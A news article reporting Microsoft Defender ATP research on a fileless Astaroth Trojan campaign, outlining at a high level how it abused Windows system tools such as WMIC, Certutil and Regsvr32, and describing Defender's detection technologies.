Yesterday, the Microsoft Defender Advanced Threat Protection (ATP) Research Team shared details of a fileless malware campaign through which attackers were dropping Astaroth Trojan into the memory of infected computers.
We recently unearthed a campaign that completely "lived off the land" throughout a complex attack chain that ran the info-stealing backdoor #Astaroth directly in memory. See how #MicrosoftDefenderATP next-gen protection defeated the #fileless attack: https://t.co/c2G53Ll2kf
— Microsoft Security Intelligence (@MsftSecIntel) July 8, 2019
Astaroth is a malware known for abusing living-off-the-land binaries (LOLbins) such as Windows Management Instrumentation Command-line (WMIC) to steal sensitive information including credentials, keystrokes, and other data. It sends stolen data to a remote attacker, who can misuse them to carry out financial theft or sell victim information in the cybercriminal underground.
This trojan has been public since 2017 and has affected a few European and Brazilian companies. As of now, Microsoft has not disclosed whether any other user’s machine was compromised.
What are fileless threats?
Fileless malware attacks either run the payload directly in the memory or use already installed applications to carry out the attack. As these attacks use legitimate programs, they are very difficult to detect for most security programs and even for experienced security analysts.
Andrea Lelli, a member of Microsoft Defender ATP Research Team, thinks that though these attacks are difficult to detect, they are certainly not undetectable. “There’s no such thing as the perfect cybercrime: even fileless malware leaves a long trail of evidence that advanced detection technologies in Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP) can detect and stop,” he wrote in the blog post.
How is the Astaroth Trojan attack implemented?
During a standard review, Lelli observed that telemetry was showing a sudden increase in the use of WMIC tool to run a script. This made him suspicious of a fileless attack. Upon further investigation, he realized that the campaign was trying to run Astaroth backdoor directly into the memory.
Here’s how the initial access and execution takes place using only system tools:
- The attack begins with a spear-phishing email containing a malicious link that redirects a user to an LNK file.
- The downloaded payloads are Base64-encoded and are decoded using the Certutil tool. While others remain encrypted, two of them are decoded to plain DLL files.
- The Regsvr32 tool loads one of the decoded DLLs, which then decrypts and loads other files until the Astaroth, the final payload is injected into the Userinit process.
How does Microsoft Defender ATP detect and stop these attacks?
Microsoft Defender ATP comes with several advanced technologies to “spot and stop a wide range of attacks.” It leverages protection capabilities from the cloud including metadata-based ML engine, behavior-based ML engine, AMSI-paired ML engine, file classification engine, among others. On the client-side, it includes protection techniques such as memory scanning engine, emulation engine, network engine, and more.
Here’s a diagram depicting all the protection technologies Microsoft Defender ATP comes with:
Check out the official post by Microsoft Defender ATP Research to know more in detail.